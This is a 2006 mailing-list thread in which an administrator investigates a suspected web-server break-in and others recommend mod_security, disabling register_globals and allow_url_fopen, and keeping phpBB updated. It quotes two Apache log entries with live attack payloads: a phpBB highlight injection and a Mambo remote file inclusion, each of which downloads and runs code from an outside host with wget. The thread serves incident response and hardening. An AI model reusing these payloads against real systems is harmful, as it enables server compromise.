I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings.
Peter
On 2/10/06, David <[EMAIL PROTECTED]> wrote:
Bill Shupp wrote:
> David wrote:
>
>> Thanks Peter - reassuring to know that someone else thinks they probably
>> didn't get root... I have been watching ps and netstat -p and haven't
>> seen anything suspicious, nor seen any more rogue messages in my mail
>> queue... fingers crossed :) I have plans to replace this box ASAP however.
>>
>> I uncovered this in the apache logs:
>>
>> ./www.myvirtualhost.domain-access_log:86.35.6.242 - -
>> [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=%
>> 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%
>>
>> 3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7
>>
>> 3%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE
>> 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
>>
>> looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the
>> system weathered that one. Closer to date is:
>>
>> ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error]
>> [client 85.214.20.161] request failed: erroneous characters aft
>> er protocol string: GET
>> /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:
>>
>> //209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
>> HTTP\\x01.1
>>
>> But it looks like that one failed. Oh well time to update php and clean
>> out a few old phpbb installs. Thanks all for your help.
>>
>> David
>>
>
>
> A few things I always run into with PHP that are popular:
>
> 1) Make sure PHPBB is the latest version and not exploitable. I used to
> allow my clients to install it, but every few months, SOMEONE would
> install an old exploitable version. I've switched to using debian's
> PHPBB package, and just point clients to it so I don't have to keep
> track of it anymore. I just run security updates daily instead on all
> packages. Haven't been exploited since.
>
> 2) Keep register_globals off, and only turn it on as needed.
>
> 3) Make sure allow_url_fopen is set to OFF. This is a very popular one,
> and in my experience tends to attract DDoS attackes rather than a mail
> exploit. But costs you expensive bandwitdth nonetheless.
>
> Regards,
>
> Bill
>
> !DSPAM:43ecbcde224031625613092!
>
>
Cheers Bill, register_globals always off, but now I will probably
disable url file operations too. Perhaps just enable them on a per-site
setting
David
